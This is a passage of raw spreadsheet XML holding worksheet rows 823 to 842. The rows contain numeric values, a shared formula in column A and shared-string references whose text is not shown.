      <c r="AE822" s="14"/>
      <c r="AF822" s="14"/>
    </row>
    <row r="823">
      <c r="A823" s="6">
        <f t="shared" si="1"/>
        <v>0.4290963111</v>
      </c>
      <c r="B823" s="29">
        <v>1.0</v>
      </c>
      <c r="C823" s="15"/>
      <c r="D823" s="14"/>
      <c r="E823" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F823" s="14"/>
      <c r="G823" s="29">
        <v>2.0</v>
      </c>
      <c r="H823" s="29">
        <v>274.0</v>
      </c>
      <c r="I823" s="29">
        <v>207556.0</v>
      </c>
      <c r="J823" s="15"/>
      <c r="K823" s="15"/>
      <c r="L823" s="15"/>
      <c r="M823" s="15"/>
      <c r="N823" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O823" s="29">
        <v>2.0</v>
      </c>
      <c r="P823" s="29">
        <v>18.0</v>
      </c>
      <c r="Q823" s="15"/>
      <c r="R823" s="15"/>
      <c r="S823" s="15"/>
      <c r="T823" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U823" s="5"/>
      <c r="V823" s="5"/>
      <c r="W823" s="47"/>
      <c r="X823" s="45"/>
      <c r="Y823" s="45"/>
      <c r="Z823" s="38" t="s">
        <v>3446</v>
      </c>
      <c r="AA823" s="39" t="s">
        <v>3447</v>
      </c>
      <c r="AB823" s="38" t="s">
        <v>3448</v>
      </c>
      <c r="AC823" s="40">
        <v>241069.0</v>
      </c>
      <c r="AD823" s="5"/>
      <c r="AE823" s="14"/>
      <c r="AF823" s="14"/>
    </row>
    <row r="824">
      <c r="A824" s="6">
        <f t="shared" si="1"/>
        <v>0.02690046961</v>
      </c>
      <c r="B824" s="29">
        <v>1.0</v>
      </c>
      <c r="C824" s="29">
        <v>1201.0</v>
      </c>
      <c r="D824" s="14"/>
      <c r="E824" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F824" s="14"/>
      <c r="G824" s="29">
        <v>9.0</v>
      </c>
      <c r="H824" s="29">
        <v>2066.0</v>
      </c>
      <c r="I824" s="29">
        <v>720.0</v>
      </c>
      <c r="J824" s="15"/>
      <c r="K824" s="29">
        <v>453.0</v>
      </c>
      <c r="L824" s="15"/>
      <c r="M824" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N824" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O824" s="29">
        <v>1.0</v>
      </c>
      <c r="P824" s="29">
        <v>0.0</v>
      </c>
      <c r="Q824" s="15"/>
      <c r="R824" s="15"/>
      <c r="S824" s="15"/>
      <c r="T824" s="5" t="s">
        <v>51</v>
      </c>
      <c r="U824" s="5"/>
      <c r="V824" s="5"/>
      <c r="W824" s="47"/>
      <c r="X824" s="45"/>
      <c r="Y824" s="45"/>
      <c r="Z824" s="38" t="s">
        <v>3449</v>
      </c>
      <c r="AA824" s="39" t="s">
        <v>3450</v>
      </c>
      <c r="AB824" s="38" t="s">
        <v>3451</v>
      </c>
      <c r="AC824" s="40">
        <v>1187.0</v>
      </c>
      <c r="AD824" s="5"/>
      <c r="AE824" s="14"/>
      <c r="AF824" s="14"/>
    </row>
    <row r="825">
      <c r="A825" s="6">
        <f t="shared" si="1"/>
        <v>0.2332220848</v>
      </c>
      <c r="B825" s="29">
        <v>1.0</v>
      </c>
      <c r="C825" s="14"/>
      <c r="D825" s="14"/>
      <c r="E825" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F825" s="14"/>
      <c r="G825" s="29">
        <v>0.0</v>
      </c>
      <c r="H825" s="29">
        <v>39.0</v>
      </c>
      <c r="I825" s="29">
        <v>217622.0</v>
      </c>
      <c r="J825" s="15"/>
      <c r="K825" s="15"/>
      <c r="L825" s="15"/>
      <c r="M825" s="14"/>
      <c r="N825" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O825" s="29">
        <v>0.0</v>
      </c>
      <c r="P825" s="29">
        <v>4.0</v>
      </c>
      <c r="Q825" s="15"/>
      <c r="R825" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S825" s="15"/>
      <c r="T825" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U825" s="5"/>
      <c r="V825" s="5"/>
      <c r="W825" s="47"/>
      <c r="X825" s="45"/>
      <c r="Y825" s="45"/>
      <c r="Z825" s="38" t="s">
        <v>3452</v>
      </c>
      <c r="AA825" s="39" t="s">
        <v>3453</v>
      </c>
      <c r="AB825" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC825" s="40">
        <v>217982.0</v>
      </c>
      <c r="AD825" s="5"/>
      <c r="AE825" s="14"/>
      <c r="AF825" s="14"/>
    </row>
    <row r="826">
      <c r="A826" s="6">
        <f t="shared" si="1"/>
        <v>0.9513965782</v>
      </c>
      <c r="B826" s="29">
        <v>1.0</v>
      </c>
      <c r="C826" s="29">
        <v>131343.0</v>
      </c>
      <c r="D826" s="14"/>
      <c r="E826" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F826" s="14"/>
      <c r="G826" s="29">
        <v>-1.0</v>
      </c>
      <c r="H826" s="29">
        <v>4136.0</v>
      </c>
      <c r="I826" s="29">
        <v>118884.0</v>
      </c>
      <c r="J826" s="15"/>
      <c r="K826" s="15"/>
      <c r="L826" s="15"/>
      <c r="M826" s="14"/>
      <c r="N826" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O826" s="29">
        <v>2.0</v>
      </c>
      <c r="P826" s="29">
        <v>2.0</v>
      </c>
      <c r="Q826" s="15"/>
      <c r="R826" s="15"/>
      <c r="S826" s="15"/>
      <c r="T826" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U826" s="5"/>
      <c r="V826" s="5"/>
      <c r="W826" s="47"/>
      <c r="X826" s="45"/>
      <c r="Y826" s="45"/>
      <c r="Z826" s="38" t="s">
        <v>3454</v>
      </c>
      <c r="AA826" s="39" t="s">
        <v>3455</v>
      </c>
      <c r="AB826" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC826" s="40">
        <v>131337.0</v>
      </c>
      <c r="AD826" s="5"/>
      <c r="AE826" s="14"/>
      <c r="AF826" s="14"/>
    </row>
    <row r="827">
      <c r="A827" s="6">
        <f t="shared" si="1"/>
        <v>0.1214775163</v>
      </c>
      <c r="B827" s="29">
        <v>1.0</v>
      </c>
      <c r="C827" s="14"/>
      <c r="D827" s="14"/>
      <c r="E827" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F827" s="14"/>
      <c r="G827" s="29">
        <v>-1.0</v>
      </c>
      <c r="H827" s="29">
        <v>4705.0</v>
      </c>
      <c r="I827" s="29">
        <v>184388.0</v>
      </c>
      <c r="J827" s="15"/>
      <c r="K827" s="15"/>
      <c r="L827" s="15"/>
      <c r="M827" s="14"/>
      <c r="N827" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O827" s="29">
        <v>1.0</v>
      </c>
      <c r="P827" s="29">
        <v>1.0</v>
      </c>
      <c r="Q827" s="15"/>
      <c r="R827" s="15"/>
      <c r="S827" s="15"/>
      <c r="T827" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U827" s="5"/>
      <c r="V827" s="5"/>
      <c r="W827" s="47"/>
      <c r="X827" s="45"/>
      <c r="Y827" s="45"/>
      <c r="Z827" s="38" t="s">
        <v>3456</v>
      </c>
      <c r="AA827" s="39" t="s">
        <v>3457</v>
      </c>
      <c r="AB827" s="38" t="s">
        <v>3458</v>
      </c>
      <c r="AC827" s="40">
        <v>191676.0</v>
      </c>
      <c r="AD827" s="5"/>
      <c r="AE827" s="14"/>
      <c r="AF827" s="14"/>
    </row>
    <row r="828">
      <c r="A828" s="6">
        <f t="shared" si="1"/>
        <v>0.03574505642</v>
      </c>
      <c r="B828" s="29">
        <v>1.0</v>
      </c>
      <c r="C828" s="29">
        <v>52121.0</v>
      </c>
      <c r="D828" s="14"/>
      <c r="E828" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F828" s="14"/>
      <c r="G828" s="29">
        <v>3.0</v>
      </c>
      <c r="H828" s="29">
        <v>173.0</v>
      </c>
      <c r="I828" s="29">
        <v>40522.0</v>
      </c>
      <c r="J828" s="15"/>
      <c r="K828" s="15"/>
      <c r="L828" s="15"/>
      <c r="M828" s="14"/>
      <c r="N828" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O828" s="29">
        <v>1.0</v>
      </c>
      <c r="P828" s="29">
        <v>0.0</v>
      </c>
      <c r="Q828" s="15"/>
      <c r="R828" s="15"/>
      <c r="S828" s="15"/>
      <c r="T828" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U828" s="5"/>
      <c r="V828" s="5"/>
      <c r="W828" s="47"/>
      <c r="X828" s="45"/>
      <c r="Y828" s="45"/>
      <c r="Z828" s="38" t="s">
        <v>3459</v>
      </c>
      <c r="AA828" s="39" t="s">
        <v>3460</v>
      </c>
      <c r="AB828" s="38" t="s">
        <v>2076</v>
      </c>
      <c r="AC828" s="40">
        <v>52030.0</v>
      </c>
      <c r="AD828" s="5"/>
      <c r="AE828" s="14"/>
      <c r="AF828" s="14"/>
    </row>
    <row r="829">
      <c r="A829" s="6">
        <f t="shared" si="1"/>
        <v>0.3514427473</v>
      </c>
      <c r="B829" s="29">
        <v>1.0</v>
      </c>
      <c r="C829" s="29">
        <v>146821.0</v>
      </c>
      <c r="D829" s="14"/>
      <c r="E829" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F829" s="14"/>
      <c r="G829" s="29">
        <v>1.0</v>
      </c>
      <c r="H829" s="29">
        <v>3427.0</v>
      </c>
      <c r="I829" s="29">
        <v>99202.0</v>
      </c>
      <c r="J829" s="15"/>
      <c r="K829" s="29">
        <v>98538.0</v>
      </c>
      <c r="L829" s="15"/>
      <c r="M829" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N829" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O829" s="29">
        <v>1.0</v>
      </c>
      <c r="P829" s="29">
        <v>0.0</v>
      </c>
      <c r="Q829" s="15"/>
      <c r="R829" s="15"/>
      <c r="S829" s="15"/>
      <c r="T829" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U829" s="5"/>
      <c r="V829" s="5"/>
      <c r="W829" s="47"/>
      <c r="X829" s="45"/>
      <c r="Y829" s="45"/>
      <c r="Z829" s="38" t="s">
        <v>3461</v>
      </c>
      <c r="AA829" s="39" t="s">
        <v>3462</v>
      </c>
      <c r="AB829" s="38" t="s">
        <v>3463</v>
      </c>
      <c r="AC829" s="40">
        <v>146818.0</v>
      </c>
      <c r="AD829" s="5"/>
      <c r="AE829" s="14"/>
      <c r="AF829" s="14"/>
    </row>
    <row r="830">
      <c r="A830" s="6">
        <f t="shared" si="1"/>
        <v>0.8478898175</v>
      </c>
      <c r="B830" s="29">
        <v>1.0</v>
      </c>
      <c r="C830" s="15"/>
      <c r="D830" s="14"/>
      <c r="E830" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F830" s="14"/>
      <c r="G830" s="29">
        <v>8.0</v>
      </c>
      <c r="H830" s="29">
        <v>863.0</v>
      </c>
      <c r="I830" s="29">
        <v>69224.0</v>
      </c>
      <c r="J830" s="15"/>
      <c r="K830" s="29">
        <v>69224.0</v>
      </c>
      <c r="L830" s="15"/>
      <c r="M830" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N830" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O830" s="29">
        <v>3.0</v>
      </c>
      <c r="P830" s="29">
        <v>4.0</v>
      </c>
      <c r="Q830" s="15"/>
      <c r="R830" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S830" s="15"/>
      <c r="T830" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U830" s="5"/>
      <c r="V830" s="5"/>
      <c r="W830" s="47"/>
      <c r="X830" s="45"/>
      <c r="Y830" s="45"/>
      <c r="Z830" s="38" t="s">
        <v>3464</v>
      </c>
      <c r="AA830" s="39" t="s">
        <v>3465</v>
      </c>
      <c r="AB830" s="38" t="s">
        <v>2429</v>
      </c>
      <c r="AC830" s="40">
        <v>195811.0</v>
      </c>
      <c r="AD830" s="5"/>
      <c r="AE830" s="14"/>
      <c r="AF830" s="14"/>
    </row>
    <row r="831">
      <c r="A831" s="6">
        <f t="shared" si="1"/>
        <v>0.8832787291</v>
      </c>
      <c r="B831" s="29">
        <v>1.0</v>
      </c>
      <c r="C831" s="29">
        <v>32349.0</v>
      </c>
      <c r="D831" s="14"/>
      <c r="E831" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F831" s="14"/>
      <c r="G831" s="29">
        <v>10.0</v>
      </c>
      <c r="H831" s="29">
        <v>16105.0</v>
      </c>
      <c r="I831" s="29">
        <v>20070.0</v>
      </c>
      <c r="J831" s="15"/>
      <c r="K831" s="15"/>
      <c r="L831" s="15"/>
      <c r="M831" s="15"/>
      <c r="N831" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O831" s="29">
        <v>2.0</v>
      </c>
      <c r="P831" s="29">
        <v>1.0</v>
      </c>
      <c r="Q831" s="15"/>
      <c r="R831" s="15"/>
      <c r="S831" s="15"/>
      <c r="T831" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U831" s="5"/>
      <c r="V831" s="5"/>
      <c r="W831" s="47"/>
      <c r="X831" s="45"/>
      <c r="Y831" s="45"/>
      <c r="Z831" s="38" t="s">
        <v>3466</v>
      </c>
      <c r="AA831" s="39" t="s">
        <v>3467</v>
      </c>
      <c r="AB831" s="38" t="s">
        <v>3468</v>
      </c>
      <c r="AC831" s="40">
        <v>32347.0</v>
      </c>
      <c r="AD831" s="5"/>
      <c r="AE831" s="14"/>
      <c r="AF831" s="14"/>
    </row>
    <row r="832">
      <c r="A832" s="6">
        <f t="shared" si="1"/>
        <v>0.8535695825</v>
      </c>
      <c r="B832" s="29">
        <v>1.0</v>
      </c>
      <c r="C832" s="15"/>
      <c r="D832" s="14"/>
      <c r="E832" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F832" s="14"/>
      <c r="G832" s="29">
        <v>3.0</v>
      </c>
      <c r="H832" s="29">
        <v>187.0</v>
      </c>
      <c r="I832" s="29">
        <v>244930.0</v>
      </c>
      <c r="J832" s="15"/>
      <c r="K832" s="15"/>
      <c r="L832" s="15"/>
      <c r="M832" s="14"/>
      <c r="N832" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O832" s="29">
        <v>1.0</v>
      </c>
      <c r="P832" s="29">
        <v>2.0</v>
      </c>
      <c r="Q832" s="15"/>
      <c r="R832" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S832" s="15"/>
      <c r="T832" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U832" s="5"/>
      <c r="V832" s="5"/>
      <c r="W832" s="47"/>
      <c r="X832" s="45"/>
      <c r="Y832" s="45"/>
      <c r="Z832" s="38" t="s">
        <v>3469</v>
      </c>
      <c r="AA832" s="39" t="s">
        <v>3470</v>
      </c>
      <c r="AB832" s="38" t="s">
        <v>3471</v>
      </c>
      <c r="AC832" s="40">
        <v>240206.0</v>
      </c>
      <c r="AD832" s="5"/>
      <c r="AE832" s="14"/>
      <c r="AF832" s="14"/>
    </row>
    <row r="833">
      <c r="A833" s="6">
        <f t="shared" si="1"/>
        <v>0.8272711457</v>
      </c>
      <c r="B833" s="29">
        <v>1.0</v>
      </c>
      <c r="C833" s="29">
        <v>163625.0</v>
      </c>
      <c r="D833" s="14"/>
      <c r="E833" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F833" s="14"/>
      <c r="G833" s="29">
        <v>0.0</v>
      </c>
      <c r="H833" s="29">
        <v>264.0</v>
      </c>
      <c r="I833" s="29">
        <v>152817.0</v>
      </c>
      <c r="J833" s="15"/>
      <c r="K833" s="15"/>
      <c r="L833" s="15"/>
      <c r="M833" s="15"/>
      <c r="N833" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O833" s="29">
        <v>2.0</v>
      </c>
      <c r="P833" s="29">
        <v>2.0</v>
      </c>
      <c r="Q833" s="15"/>
      <c r="R833" s="15"/>
      <c r="S833" s="15"/>
      <c r="T833" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U833" s="5"/>
      <c r="V833" s="5"/>
      <c r="W833" s="47"/>
      <c r="X833" s="45"/>
      <c r="Y833" s="45"/>
      <c r="Z833" s="38" t="s">
        <v>3472</v>
      </c>
      <c r="AA833" s="39" t="s">
        <v>3473</v>
      </c>
      <c r="AB833" s="38" t="s">
        <v>3474</v>
      </c>
      <c r="AC833" s="40">
        <v>163619.0</v>
      </c>
      <c r="AD833" s="5"/>
      <c r="AE833" s="14"/>
      <c r="AF833" s="14"/>
    </row>
    <row r="834">
      <c r="A834" s="6">
        <f t="shared" si="1"/>
        <v>0.3452757153</v>
      </c>
      <c r="B834" s="29">
        <v>1.0</v>
      </c>
      <c r="C834" s="14"/>
      <c r="D834" s="14"/>
      <c r="E834" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F834" s="14"/>
      <c r="G834" s="29">
        <v>4.0</v>
      </c>
      <c r="H834" s="29">
        <v>1186.0</v>
      </c>
      <c r="I834" s="29">
        <v>76375.0</v>
      </c>
      <c r="J834" s="15"/>
      <c r="K834" s="29">
        <v>78998.0</v>
      </c>
      <c r="L834" s="15"/>
      <c r="M834" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N834" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O834" s="29">
        <v>2.0</v>
      </c>
      <c r="P834" s="29">
        <v>3.0</v>
      </c>
      <c r="Q834" s="15"/>
      <c r="R834" s="15"/>
      <c r="S834" s="15"/>
      <c r="T834" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U834" s="5"/>
      <c r="V834" s="5"/>
      <c r="W834" s="47"/>
      <c r="X834" s="45"/>
      <c r="Y834" s="45"/>
      <c r="Z834" s="38" t="s">
        <v>3475</v>
      </c>
      <c r="AA834" s="39" t="s">
        <v>3476</v>
      </c>
      <c r="AB834" s="38" t="s">
        <v>3477</v>
      </c>
      <c r="AC834" s="40">
        <v>92977.0</v>
      </c>
      <c r="AD834" s="5"/>
      <c r="AE834" s="14"/>
      <c r="AF834" s="14"/>
    </row>
    <row r="835">
      <c r="A835" s="6">
        <f t="shared" si="1"/>
        <v>0.6999903154</v>
      </c>
      <c r="B835" s="29">
        <v>1.0</v>
      </c>
      <c r="C835" s="15"/>
      <c r="D835" s="14"/>
      <c r="E835" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F835" s="14"/>
      <c r="G835" s="29">
        <v>0.0</v>
      </c>
      <c r="H835" s="29">
        <v>432.0</v>
      </c>
      <c r="I835" s="29">
        <v>116943.0</v>
      </c>
      <c r="J835" s="15"/>
      <c r="K835" s="29">
        <v>86652.0</v>
      </c>
      <c r="L835" s="14"/>
      <c r="M835" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N835" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O835" s="29">
        <v>1.0</v>
      </c>
      <c r="P835" s="29">
        <v>1.0</v>
      </c>
      <c r="Q835" s="15"/>
      <c r="R835" s="15"/>
      <c r="S835" s="15"/>
      <c r="T835" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U835" s="5"/>
      <c r="V835" s="5"/>
      <c r="W835" s="47"/>
      <c r="X835" s="45"/>
      <c r="Y835" s="45"/>
      <c r="Z835" s="38" t="s">
        <v>3478</v>
      </c>
      <c r="AA835" s="39" t="s">
        <v>3479</v>
      </c>
      <c r="AB835" s="38" t="s">
        <v>3480</v>
      </c>
      <c r="AC835" s="40">
        <v>129511.0</v>
      </c>
      <c r="AD835" s="5"/>
      <c r="AE835" s="14"/>
      <c r="AF835" s="14"/>
    </row>
    <row r="836">
      <c r="A836" s="6">
        <f t="shared" si="1"/>
        <v>0.4270694507</v>
      </c>
      <c r="B836" s="29">
        <v>1.0</v>
      </c>
      <c r="C836" s="29">
        <v>11394.0</v>
      </c>
      <c r="D836" s="14"/>
      <c r="E836" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F836" s="14"/>
      <c r="G836" s="29">
        <v>2.0</v>
      </c>
      <c r="H836" s="29">
        <v>762.0</v>
      </c>
      <c r="I836" s="29">
        <v>7537.0</v>
      </c>
      <c r="J836" s="15"/>
      <c r="K836" s="29">
        <v>31854.0</v>
      </c>
      <c r="L836" s="15"/>
      <c r="M836" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N836" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O836" s="29">
        <v>2.0</v>
      </c>
      <c r="P836" s="29">
        <v>0.0</v>
      </c>
      <c r="Q836" s="15"/>
      <c r="R836" s="15"/>
      <c r="S836" s="15"/>
      <c r="T836" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U836" s="5"/>
      <c r="V836" s="5"/>
      <c r="W836" s="47"/>
      <c r="X836" s="45"/>
      <c r="Y836" s="45"/>
      <c r="Z836" s="38" t="s">
        <v>3481</v>
      </c>
      <c r="AA836" s="39" t="s">
        <v>3482</v>
      </c>
      <c r="AB836" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC836" s="40">
        <v>11393.0</v>
      </c>
      <c r="AD836" s="5"/>
      <c r="AE836" s="14"/>
      <c r="AF836" s="14"/>
    </row>
    <row r="837">
      <c r="A837" s="6">
        <f t="shared" si="1"/>
        <v>0.3903013512</v>
      </c>
      <c r="B837" s="29">
        <v>1.0</v>
      </c>
      <c r="C837" s="15"/>
      <c r="D837" s="14"/>
      <c r="E837" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F837" s="14"/>
      <c r="G837" s="29">
        <v>0.0</v>
      </c>
      <c r="H837" s="29">
        <v>1587.0</v>
      </c>
      <c r="I837" s="29">
        <v>259901.0</v>
      </c>
      <c r="J837" s="15"/>
      <c r="K837" s="15"/>
      <c r="L837" s="15"/>
      <c r="M837" s="14"/>
      <c r="N837" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O837" s="29">
        <v>1.0</v>
      </c>
      <c r="P837" s="29">
        <v>0.0</v>
      </c>
      <c r="Q837" s="15"/>
      <c r="R837" s="15"/>
      <c r="S837" s="15"/>
      <c r="T837" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U837" s="5"/>
      <c r="V837" s="5"/>
      <c r="W837" s="47"/>
      <c r="X837" s="45"/>
      <c r="Y837" s="45"/>
      <c r="Z837" s="38" t="s">
        <v>3483</v>
      </c>
      <c r="AA837" s="39" t="s">
        <v>3484</v>
      </c>
      <c r="AB837" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC837" s="40">
        <v>251364.0</v>
      </c>
      <c r="AD837" s="5"/>
      <c r="AE837" s="14"/>
      <c r="AF837" s="14"/>
    </row>
    <row r="838">
      <c r="A838" s="6">
        <f t="shared" si="1"/>
        <v>0.3436332102</v>
      </c>
      <c r="B838" s="29">
        <v>1.0</v>
      </c>
      <c r="C838" s="29">
        <v>7835.0</v>
      </c>
      <c r="D838" s="14"/>
      <c r="E838" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F838" s="14"/>
      <c r="G838" s="29">
        <v>2.0</v>
      </c>
      <c r="H838" s="29">
        <v>1319.0</v>
      </c>
      <c r="I838" s="29">
        <v>5289.0</v>
      </c>
      <c r="J838" s="15"/>
      <c r="K838" s="29">
        <v>665.0</v>
      </c>
      <c r="L838" s="15"/>
      <c r="M838" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N838" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O838" s="29">
        <v>2.0</v>
      </c>
      <c r="P838" s="29">
        <v>0.0</v>
      </c>
      <c r="Q838" s="15"/>
      <c r="R838" s="15"/>
      <c r="S838" s="15"/>
      <c r="T838" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U838" s="5"/>
      <c r="V838" s="5"/>
      <c r="W838" s="47"/>
      <c r="X838" s="45"/>
      <c r="Y838" s="45"/>
      <c r="Z838" s="38" t="s">
        <v>3485</v>
      </c>
      <c r="AA838" s="39" t="s">
        <v>3486</v>
      </c>
      <c r="AB838" s="38" t="s">
        <v>3487</v>
      </c>
      <c r="AC838" s="40">
        <v>7833.0</v>
      </c>
      <c r="AD838" s="5"/>
      <c r="AE838" s="14"/>
      <c r="AF838" s="14"/>
    </row>
    <row r="839">
      <c r="A839" s="6">
        <f t="shared" si="1"/>
        <v>0.8524289453</v>
      </c>
      <c r="B839" s="29">
        <v>1.0</v>
      </c>
      <c r="C839" s="15"/>
      <c r="D839" s="14"/>
      <c r="E839" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F839" s="14"/>
      <c r="G839" s="29">
        <v>0.0</v>
      </c>
      <c r="H839" s="29">
        <v>457.0</v>
      </c>
      <c r="I839" s="29">
        <v>105337.0</v>
      </c>
      <c r="J839" s="15"/>
      <c r="K839" s="29">
        <v>105337.0</v>
      </c>
      <c r="L839" s="15"/>
      <c r="M839" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N839" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O839" s="29">
        <v>1.0</v>
      </c>
      <c r="P839" s="29">
        <v>0.0</v>
      </c>
      <c r="Q839" s="15"/>
      <c r="R839" s="15"/>
      <c r="S839" s="15"/>
      <c r="T839" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U839" s="5"/>
      <c r="V839" s="5"/>
      <c r="W839" s="47"/>
      <c r="X839" s="45"/>
      <c r="Y839" s="45"/>
      <c r="Z839" s="38" t="s">
        <v>3488</v>
      </c>
      <c r="AA839" s="39" t="s">
        <v>3489</v>
      </c>
      <c r="AB839" s="38" t="s">
        <v>3490</v>
      </c>
      <c r="AC839" s="40">
        <v>218611.0</v>
      </c>
      <c r="AD839" s="5"/>
      <c r="AE839" s="14"/>
      <c r="AF839" s="14"/>
    </row>
    <row r="840">
      <c r="A840" s="6">
        <f t="shared" si="1"/>
        <v>0.5036097536</v>
      </c>
      <c r="B840" s="29">
        <v>1.0</v>
      </c>
      <c r="C840" s="15"/>
      <c r="D840" s="14"/>
      <c r="E840" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F840" s="14"/>
      <c r="G840" s="29">
        <v>1.0</v>
      </c>
      <c r="H840" s="29">
        <v>1751.0</v>
      </c>
      <c r="I840" s="29">
        <v>45127.0</v>
      </c>
      <c r="J840" s="15"/>
      <c r="K840" s="29">
        <v>45127.0</v>
      </c>
      <c r="L840" s="15"/>
      <c r="M840" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N840" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O840" s="29">
        <v>2.0</v>
      </c>
      <c r="P840" s="29">
        <v>0.0</v>
      </c>
      <c r="Q840" s="15"/>
      <c r="R840" s="15"/>
      <c r="S840" s="15"/>
      <c r="T840" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U840" s="5"/>
      <c r="V840" s="5"/>
      <c r="W840" s="47"/>
      <c r="X840" s="45"/>
      <c r="Y840" s="45"/>
      <c r="Z840" s="38" t="s">
        <v>3491</v>
      </c>
      <c r="AA840" s="39" t="s">
        <v>3492</v>
      </c>
      <c r="AB840" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC840" s="40">
        <v>56296.0</v>
      </c>
      <c r="AD840" s="5"/>
      <c r="AE840" s="14"/>
      <c r="AF840" s="14"/>
    </row>
    <row r="841">
      <c r="A841" s="6">
        <f t="shared" si="1"/>
        <v>0.9200549586</v>
      </c>
      <c r="B841" s="29">
        <v>1.0</v>
      </c>
      <c r="C841" s="14"/>
      <c r="D841" s="14"/>
      <c r="E841" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F841" s="14"/>
      <c r="G841" s="29">
        <v>1.0</v>
      </c>
      <c r="H841" s="29">
        <v>202.0</v>
      </c>
      <c r="I841" s="29">
        <v>37677.0</v>
      </c>
      <c r="J841" s="15"/>
      <c r="K841" s="29">
        <v>37677.0</v>
      </c>
      <c r="L841" s="15"/>
      <c r="M841" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N841" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O841" s="29">
        <v>0.0</v>
      </c>
      <c r="P841" s="29">
        <v>3.0</v>
      </c>
      <c r="Q841" s="15"/>
      <c r="R841" s="15"/>
      <c r="S841" s="15"/>
      <c r="T841" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U841" s="5"/>
      <c r="V841" s="5"/>
      <c r="W841" s="47"/>
      <c r="X841" s="45"/>
      <c r="Y841" s="45"/>
      <c r="Z841" s="38" t="s">
        <v>3493</v>
      </c>
      <c r="AA841" s="39" t="s">
        <v>3494</v>
      </c>
      <c r="AB841" s="38" t="s">
        <v>3495</v>
      </c>
      <c r="AC841" s="40">
        <v>75865.0</v>
      </c>
      <c r="AD841" s="5"/>
      <c r="AE841" s="14"/>
      <c r="AF841" s="14"/>
    </row>
    <row r="842">
      <c r="A842" s="6">
        <f t="shared" si="1"/>
        <v>0.6495514768</v>
      </c>
      <c r="B842" s="29">
        <v>1.0</v>
      </c>
      <c r="C842" s="29">
        <v>262396.0</v>
      </c>
      <c r="D842" s="14"/>
      <c r="E842" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F842" s="14"/>
      <c r="G842" s="29">
        <v>3.0</v>
      </c>
      <c r="H842" s="29">
        <v>869.0</v>
      </c>
      <c r="I842" s="29">
        <v>168736.0</v>
      </c>
      <c r="J842" s="15"/>
      <c r="K842" s="15"/>
      <c r="L842" s="15"/>
      <c r="M842" s="15"/>
      <c r="N842" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O842" s="29">
        <v>1.0</v>
      </c>
      <c r="P842" s="29">
        <v>3.0</v>
      </c>
      <c r="Q842" s="15"/>
      <c r="R842" s="15"/>
      <c r="S842" s="15"/>
      <c r="T842" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U842" s="5"/>
      <c r="V842" s="5"/>
      <c r="W842" s="47"/>
      <c r="X842" s="45"/>
